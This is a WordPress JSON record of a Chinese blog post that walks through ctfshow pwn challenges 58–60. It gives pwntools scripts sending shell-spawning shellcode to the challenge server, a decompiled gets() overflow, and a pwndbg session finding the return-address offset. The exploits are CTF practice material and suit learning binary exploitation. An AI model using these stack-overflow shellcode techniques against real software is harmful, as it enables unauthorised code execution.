{"id":300,"date":"2025-03-22T23:13:15","date_gmt":"2025-03-22T15:13:15","guid":{"rendered":"http:\/\/www.okabe.xin\/?p=300"},"modified":"2025-03-22T23:13:15","modified_gmt":"2025-03-22T15:13:15","slug":"%e5%8f%af%e7%ac%91%e5%90%97-%e6%88%91%e5%81%9a%e4%b8%8d%e5%87%bapwn%e7%9a%84%e6%97%b6%e5%80%99%e6%9c%89%e5%a4%9a%e6%85%8c%e5%bc%a0%ef%bc%8c%e5%ae%83%e4%bc%9a%e7%9c%8b%e8%a7%81%e5%90%97%c2%b7%c2%b7","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=300","title":{"rendered":"\u53ef\u7b11\u5417 \u6211\u505a\u4e0d\u51fapwn\u7684\u65f6\u5019\u6709\u591a\u614c\u5f20\uff0c\u5b83\u4f1a\u770b\u89c1\u5417\u00b7\u00b7\u00b7"},"content":{"rendered":"\n

pwn58<\/h2>\n\n\n\n

checksec<\/p>\n\n\n\n

32\u4f4d<\/p>\n\n\n\n

IDA\u5206\u6790<\/p>\n\n\n\n

main\u51fd\u6570\u53cd\u7f16\u8bd1\u5931\u8d25\uff0c\u6000\u7591\u5c31\u662f\u8fd9\u6837\u8bbe\u8ba1\u7684\uff08\uff09<\/p>\n\n\n\n

\u5c31\u76f4\u63a5\u5c06\u5c31\u6c47\u7f16\u8fdb\u884c\u5206\u6790<\/p>\n\n\n\n

\u5927\u81f4\u7684\u51fd\u6570\u987a\u5e8f\u5c31\u662f\u5148logo\u518dctfshow\u51fd\u6570<\/p>\n\n\n\n

logo\u51fd\u6570\u4e00\u5982\u65e2\u5f80\u6ca1\u4e1c\u897f<\/p>\n\n\n\n

\u8fdbctfshow\u51fd\u6570<\/p>\n\n\n\n

ctfshow\u51fd\u6570\u53ea\u6709\u4e2agets\u51fd\u6570<\/p>\n\n\n\n

\u627e\u904d\u5b57\u6bb5\u6ca1\u627e\u5230\u540e\u95e8<\/p>\n\n\n\n

\u81ea\u884c\u4f20\u5165shellcode\u5373\u53ef<\/p>\n\n\n\n

from pwn import *
p = remote(\"pwn.challenge.ctf.show\",28305)
shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
p.sendline(shellcode)
p.interactive()<\/code><\/pre>\n\n\n\n
pwn59<\/h2>\n\n\n\n
64\u4f4dshellcode<\/p>\n\n\n\n
\u4e0d\u7528\u50cf\u4e4b\u524d\u768464\u4f4d\u4f20\u53c2\u4e00\u6837\u9700\u8981\u627erdi\u5565\u7684\u4f4d\u7f6e<\/p>\n\n\n\n
\u76f4\u63a5\u4f20shellcode\u5373\u53ef<\/p>\n\n\n\n
\u4f46\u662f\u5fc5\u987b\u52a0\u4e0a\u67b6\u6784\u624d\u80fd\u6253\u901a<\/p>\n\n\n\n
from pwn import *
p = remote(\"pwn.challenge.ctf.show\",28125)
context.arch='amd64'
shellcode = asm(shellcraft.sh())
payload = shellcode
p.sendline(payload)
p.interactive()<\/code><\/pre>\n\n\n\n
pwn60<\/h2>\n\n\n\n
\u7a0d\u96be\u7684shellcode<\/p>\n\n\n\n
checksec<\/p>\n\n\n\n
32\u4f4d<\/p>\n\n\n\n
\u770bmain\u51fd\u6570<\/p>\n\n\n\n
\u5b58\u5728\u4e00\u4e2agets\u51fd\u6570\u548c\u4e00\u4e2astrncpy\u51fd\u6570<\/p>\n\n\n\n
gets\u51fd\u6570\u5c31\u5f88\u660e\u663e\u7684\u9700\u8981\u8fdb\u884c\u4e00\u4e2a\u6ea2\u51fa\u5904\u7406<\/p>\n\n\n\n
strncpy\u662f\u628as\u590d\u5236\u7ed9buf2<\/p>\n\n\n\n
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; \/\/ [esp+1Ch] [ebp-64h] BYREF
\u200b
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts(\"CTFshow-pwn can u pwn me here!!\");
  gets(s);
  strncpy(buf2, s, 0x64u);
  printf(\"See you ~\");
  return 0;
}
\u200b
\u200b<\/code><\/pre>\n\n\n\n
\u6240\u4ee5gdb\u52a8\u6001\u8c03\u8bd5\u641e\u51fa\u504f\u79fb\u91cf<\/p>\n\n\n\n
gdb\u6709\u65f6\u4f1a\u51fa\u73b0\u6ca1\u6709\u6743\u9650\u7684\u60c5\u51b5<\/p>\n\n\n\n
\u4f7f\u7528\u6307\u4ee4<\/p>\n\n\n\n
chmod 777 pwn60<\/pre>\n\n\n\n
\u7136\u540e\u6b63\u5e38\u8c03\u8bd5\u51fd\u6570\u5373\u53ef<\/p>\n\n\n\n
\u5177\u4f53\u8c03\u8bd5\u6d41\u7a0b\uff1a<\/p>\n\n\n\n
ctfshow@ubuntu:~\/Desktop\/xd$ chmod 777 pwn60
ctfshow@ubuntu:~\/Desktop\/xd$ gdb pwn60
GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type \"show copying\"
and \"show warranty\" for details.
This GDB was configured as \"x86_64-linux-gnu\".
Type \"show configuration\" for configuration details.
For bug reporting instructions, please see:
<http:\/\/www.gnu.org\/software\/gdb\/bugs\/>.
Find the GDB manual and other documentation resources online at:
<http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.
For help, type \"help\".
Type \"apropos word\" to search for commands related to \"word\"...
pwndbg: loaded 191 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print\/break)
Reading symbols from pwn60...done.
pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
pwndbg> r
Starting program: \/home\/ctfshow\/Desktop\/xd\/pwn60 
CTFshow-pwn can u pwn me here!!
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
See you ~
Program received signal SIGSEGV, Segmentation fault.
0x62616164 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ REGISTERS ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
 EAX  0x0
 EBX  0x0
 ECX  0x9
 EDX  0xf7fad890 (_IO_stdfile_1_lock) \u25c2\u2014 0
 EDI  0x0
 ESI  0xf7fac000 (_GLOBAL_OFFSET_TABLE_) \u25c2\u2014 0x1d7d8c
 EBP  0x62616163 ('caab')
 ESP  0xffffcf30 \u25c2\u2014 'eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
 EIP  0x62616164 ('daab')
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ DISASM ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
Invalid address 0x62616164
\u200b
\u200b
\u200b
\u200b
\u200b
\u200b
\u200b
\u200b
\u200b
\u200b
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ STACK ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
00:0000\u2502 esp  0xffffcf30 \u25c2\u2014 'eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
01:0004\u2502      0xffffcf34 \u25c2\u2014 'faabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
02:0008\u2502      0xffffcf38 \u25c2\u2014 'gaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
03:000c\u2502      0xffffcf3c \u25c2\u2014 'haabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
04:0010\u2502      0xffffcf40 \u25c2\u2014 'iaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
05:0014\u2502      0xffffcf44 \u25c2\u2014 'jaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
06:0018\u2502      0xffffcf48 \u25c2\u2014 'kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
07:001c\u2502      0xffffcf4c \u25c2\u2014 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ BACKTRACE ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
 \u25ba f 0 62616164
   f 1 62616165
   f 2 62616166
   f 3 62616167
   f 4 62616168
   f 5 62616169
   f 6 6261616a
   f 7 6261616b
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
pwndbg> cyclic -l
usage: pwn cyclic [-h] [-a alphabet] [-n length] [-c context] [-l lookup_value | count]
pwn cyclic: error: argument -l\/-o\/--offset\/--lookup: expected one argument
pwndbg> cyclic -l 62616164
[CRITICAL] Pattern contains characters not present in the alphabet
pwndbg> cyclic -l 0x62616164
112<\/code><\/pre>\n\n\n\n
\u6700\u540e\u62ff\u5230\u4e86\u5b9e\u9645\u7684\u504f\u79fb\u91cf<\/p>\n\n\n\n
\u5c31\u8fd9\u6837\u76f4\u63a5\u6253shellcode\uff0c\u7528ljust\u65b9\u6cd5\u8865\u9f50buf2\u5b57\u6bb5\u5373\u53ef<\/p>\n\n\n\n
from pwn import *
context.log_level = 'debug'
p = remote(\"pwn.challenge.ctf.show\", 28291)
e = ELF(\".\/pwn60\")
buf2 = e.sym['buf2']
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(112, b'a') + p32(buf2)
p.sendline(payload)
p.interactive()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
pwn58 checksec 32\u4f4d IDA\u5206\u6790 main\u51fd\u6570\u53cd\u7f16\u8bd1\u5931\u8d25\uff0c\u6000\u7591\u5c31\u662f\u8fd9\u6837\u8bbe\u8ba1\u7684\uff08\uff09 \u5c31\u76f4\u63a5\u5c06\u5c31\u6c47 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-300","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/300","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=300"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/300\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=300"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=300"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}